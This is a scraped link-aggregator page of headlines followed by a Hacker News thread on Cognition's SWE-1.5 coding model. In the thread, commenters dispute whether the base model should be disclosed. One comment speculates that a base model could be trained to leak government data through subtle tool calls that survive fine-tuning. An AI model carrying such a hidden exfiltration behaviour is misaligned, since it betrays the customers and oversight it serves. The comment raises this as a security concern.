frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

fp.

Why there is no official statement from Substack about the data leak

https://techcrunch.com/2026/02/05/substack-confirms-data-breach-affecting-email-addresses-and-pho...
2•witnessme•3m ago•1 comments

Effects of Zepbound on Stool Quality

https://twitter.com/ScottHickle/status/2020150085296775300
1•aloukissas•6m ago•0 comments

Show HN: Seedance 2.0 – The Most Powerful AI Video Generator

https://seedance.ai/
1•bigbromaker•9m ago•0 comments

Ask HN: Do we need "metadata in source code" syntax that LLMs will never delete?

1•andrewstuart•15m ago•1 comments

Pentagon cutting ties w/ "woke" Harvard, ending military training & fellowships

https://www.cbsnews.com/news/pentagon-says-its-cutting-ties-with-woke-harvard-discontinuing-milit...
3•alephnerd•18m ago•1 comments

Can Quantum-Mechanical Description of Physical Reality Be Considered Complete? [pdf]

https://cds.cern.ch/record/405662/files/PhysRev.47.777.pdf
1•northlondoner•18m ago•1 comments

Kessler Syndrome Has Started [video]

https://www.tiktok.com/@cjtrowbridge/video/7602634355160206623
1•pbradv•21m ago•0 comments

Complex Heterodynes Explained

https://tomverbeure.github.io/2026/02/07/Complex-Heterodyne.html
3•hasheddan•21m ago•0 comments

EVs Are a Failed Experiment

https://spectator.org/evs-are-a-failed-experiment/
2•ArtemZ•33m ago•4 comments

MemAlign: Building Better LLM Judges from Human Feedback with Scalable Memory

https://www.databricks.com/blog/memalign-building-better-llm-judges-human-feedback-scalable-memory
1•superchink•33m ago•0 comments

CCC (Claude's C Compiler) on Compiler Explorer

https://godbolt.org/z/asjc13sa6
2•LiamPowell•35m ago•0 comments

Homeland Security Spying on Reddit Users

https://www.kenklippenstein.com/p/homeland-security-spies-on-reddit
3•duxup•38m ago•0 comments

Actors with Tokio (2021)

https://ryhl.io/blog/actors-with-tokio/
1•vinhnx•39m ago•0 comments

Can graph neural networks for biology realistically run on edge devices?

https://doi.org/10.21203/rs.3.rs-8645211/v1
1•swapinvidya•51m ago•1 comments

Deeper into the shareing of one air conditioner for 2 rooms

1•ozzysnaps•53m ago•0 comments

Weatherman introduces fruit-based authentication system to combat deep fakes

https://www.youtube.com/watch?v=5HVbZwJ9gPE
3•savrajsingh•54m ago•0 comments

Why Embedded Models Must Hallucinate: A Boundary Theory (RCC)

http://www.effacermonexistence.com/rcc-hn-1-1
1•formerOpenAI•56m ago•2 comments

A Curated List of ML System Design Case Studies

https://github.com/Engineer1999/A-Curated-List-of-ML-System-Design-Case-Studies
3•tejonutella•1h ago•0 comments

Pony Alpha: New free 200K context model for coding, reasoning and roleplay

https://ponyalpha.pro
1•qzcanoe•1h ago•1 comments

Show HN: Tunbot – Discord bot for temporary Cloudflare tunnels behind CGNAT

https://github.com/Goofygiraffe06/tunbot
2•g1raffe•1h ago•0 comments

Open Problems in Mechanistic Interpretability

https://arxiv.org/abs/2501.16496
2•vinhnx•1h ago•0 comments

Bye Bye Humanity: The Potential AMOC Collapse

https://thatjoescott.com/2026/02/03/bye-bye-humanity-the-potential-amoc-collapse/
3•rolph•1h ago•0 comments

Dexter: Claude-Code-Style Agent for Financial Statements and Valuation

https://github.com/virattt/dexter
1•Lwrless•1h ago•0 comments

Digital Iris [video]

https://www.youtube.com/watch?v=Kg_2MAgS_pE
1•vermilingua•1h ago•0 comments

Essential CDN: The CDN that lets you do more than JavaScript

https://essentialcdn.fluidity.workers.dev/
1•telui•1h ago•1 comments

They Hijacked Our Tech [video]

https://www.youtube.com/watch?v=-nJM5HvnT5k
2•cedel2k1•1h ago•0 comments

Vouch

https://twitter.com/mitchellh/status/2020252149117313349
41•chwtutha•1h ago•7 comments

HRL Labs in Malibu laying off 1/3 of their workforce

https://www.dailynews.com/2026/02/06/hrl-labs-cuts-376-jobs-in-malibu-after-losing-government-work/
4•osnium123•1h ago•1 comments

Show HN: High-performance bidirectional list for React, React Native, and Vue

https://suhaotian.github.io/broad-infinite-list/
2•jeremy_su•1h ago•0 comments

Show HN: I built a Mac screen recorder Recap.Studio

https://recap.studio/
1•fx31xo•1h ago•1 comments
Open in hackernews

Cognition Releases SWE-1.5: Near-SOTA Coding Performance at 950 tok/s

https://cognition.ai/blog/swe-1-5
11•yashvg•3mo ago

Comments

swyx•3mo ago
(coauthor) xpost here: https://x.com/cognition/status/1983662836896448756

happy to answer any questions. i think my higher level insight to paraphrase McLuhan, "first the model shapes the harness, then the harness shapes the model". this is the first model that combines cognition's new gb200 cluster, cerebras' cs3 inference, and data from our evals work with {partners} as referenced in https://www.theinformation.com/articles/anthropic-openai-usi...

CuriouslyC•3mo ago
In the interest of transparency you should update your post with the model you fine tuned, it matters.
swyx•3mo ago
this is not a question and an assertion that your values are more important than mine, with none of my context nor none of your reasoning. you see how this tone is an issue?

regardless of what i'm allowed to say, i will personally defend that actually its increasingly less important the qualities of the base model you choose as long as its "good enough", bc then the RL/posttrain qualities and data takes over from there and is the entire point of differentiation

CuriouslyC•3mo ago
If you had enough tokens to completely wash out the parent latent distribution you would have just trained a new model instead of fine tuning. That means by definition your model is still inheriting properties of the parent, and for your business customers who want predictable, understandable systems, knowing the inherited properties of your model is going to be useful.

I think the real reason is that it's a Chinese model (I mean, come on) and your parent company doesn't want any political blowback.

luisml77•3mo ago
> you would have just trained a new model instead of fine tuning

As if it doesn't cost tens of millions to pre-train a model. Not to mention the time it takes. Do you want them to stall progress for no good reason?

CuriouslyC•3mo ago
Originally I just wanted to know what their base model was out of curiosity. Since they fired off such a friendly reply, now I want to know if they're trying to pass off a fine tuned Chinese model to government customers who have directives to avoid Chinese models with hand waiving about how it's safe now because they did some RL on it.
luisml77•3mo ago
I mean I was going to say that was ridiculous but now that I think about it more, its possible that the models can be trained to say spy on government data by calling a tool to send the information to China. And some RL might not wipe off that behavior.

I doubt current models from China are trained to do smart spying / injecting sneaky tool calls. But based on my Deep Learning experience with the models both training and inference, it's definitely possible to train a model to do this in a very subtle and hard to detect way...

So your point is valid and I think they should specify the base model for security concerns, or conduct safety evaluations on it before passing it to sensitive customers

pandada8•3mo ago
very curious, which model can only run up to 950 tok/s even with cerebras.